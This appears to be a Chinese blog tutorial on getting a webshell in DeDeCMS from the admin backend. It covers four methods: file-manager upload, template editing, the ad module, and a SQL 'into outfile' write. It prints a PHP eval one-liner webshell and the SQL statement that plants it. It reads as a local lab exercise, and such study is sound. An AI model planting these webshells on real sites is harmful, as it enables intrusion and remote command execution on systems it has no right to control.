CMS漏洞-DeDeCMS篇

一.姿势一:通过⽂件管理器上传WebShell

1.首先我们搭建网站然后进行登录

2.模块👉文件管理器👉文件上传

3.新建一个1.php文件,内容为:

<?php phpinfo();?>

选择1.php文件上传

4.访问网站根目录下的1.php,发现代码成功执行,说明我们的木马上传成功!!

二.姿势二:修改模板文件拿WebShell

1.模板👉默认模板管理👉index.htm👉修改

2.插入代码:

<?php phpinfo();?>并保存

3.生成👉更新主机html,主页位置修改为index.php,生成静态,更新主页html

4.访问主页,发现主页为phpinfo界面,说明我们植入的代码有效!

三.姿势三:后台任意命令执⾏拿WebShell

1.模块👉广告管理

在内容上写入代码:

<?php phpinfo();?>

2.上传成功后查看代码,并复制引号内容

3.访问后发现页面无回显

4.现在我们将代码换为一句话木马:

<?php @eval($_POST[cmd]);?>

5.跟上述步骤一样复制引号内容并访问

6.使用蚁剑连接,连接成功!!

说明木马成功植入

四.姿势四:通过后台sql命令执⾏拿webshell

1.系统👉sql命令行工具

在命令行输入select @@basedir;

获取mysql路径,由此猜测⽹站绝对路径

2.在命令行输入:

select '<?php @eval($_POST[cmd]);?>' into outfile 'D:/phpstudy_pro/WWW/dedecms/uploads/webshell.php'

上传一句话木马到webshell.php文件

3.我们在网站根目录下发现了webshell.php文件,内容为一句话木马

4.我们访问木马文件并复制其绝对路径

5.连接成功!

木马植入成功!

相关推荐
愚公搬代码30 分钟前
【愚公系列】《人工智能70年》044-数据科学崛起(安全与隐私,硬币的另一面)
人工智能·安全
宁雨桥1 小时前
前端登录加密实战:从原理到落地,守护用户密码安全
前端·安全·状态模式
ZeroNews内网穿透2 小时前
新版发布!“零讯”微信小程序版本更新
运维·服务器·网络·python·安全·微信小程序·小程序
撰卢5 小时前
网络安全期末大论文
安全·web安全
王哥儿聊AI10 小时前
Lynx:新一代个性化视频生成模型,单图即可生成视频,重新定义身份一致性与视觉质量
人工智能·算法·安全·机器学习·音视频·软件工程
Coovally AI模型快速验证12 小时前
从避障到实时建图:机器学习如何让无人机更智能、更安全、更实用(附微型机载演示示例)
人工智能·深度学习·神经网络·学习·安全·机器学习·无人机
Gobysec12 小时前
Goby 漏洞安全通告|Spring Cloud Gateway 信息泄露漏洞(CVE-2025-41243)
spring boot·安全·cve-2025-41243
有点不太正常12 小时前
FlippedRAG——论文阅读
论文阅读·安全·大模型·rag
挨踢攻城14 小时前
Linux 安全 | 使用 iptables 测量流量
linux·服务器·安全·iptables·linux安全·厦门微思网络·测量流量
通信瓦工15 小时前
IEC 60598-1-2020灯具通用安全要求标准介绍
安全·灯具·标准下载